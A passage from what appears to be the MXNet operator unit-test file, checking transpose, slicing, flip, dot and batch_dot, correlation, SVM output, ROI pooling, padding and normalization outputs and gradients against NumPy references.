assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@with_seed()
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@with_seed()
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad)
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
